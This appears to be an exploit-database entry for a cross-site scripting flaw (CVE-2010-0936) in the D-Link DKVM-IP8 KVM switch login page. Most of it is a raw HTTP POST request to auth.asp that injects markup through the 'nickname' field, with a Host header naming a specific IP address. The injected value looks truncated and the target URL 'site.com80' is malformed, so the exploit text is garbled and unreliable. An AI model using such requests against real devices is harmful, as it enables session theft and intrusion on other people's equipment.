D-Link DKVM-IP8 - Cross-Site Scripting



EKU-ID: 18436 CVE: OSVDB-61615;CVE-2010-0936 OSVDB-ID:
Author: POPCORN Published: 2010-01-06 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: D-LINK DKVM-IP8 XSS Vulnerability
# Date: 01-06-2010
# Author: POPCORN
# Software Link: http://www.dlink.ru/
# Version: 2282_dlinkA4_p8_20071213
# Tested on: Windows Sp 2
# Site : http://Hacking.ge
# Code :
POST http://site.com80/auth.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 212.58.116.80
Content-Length: 90
Connection: Close
Pragma: no-cache
Attack details
The POST variable nickname has been set to 1>">">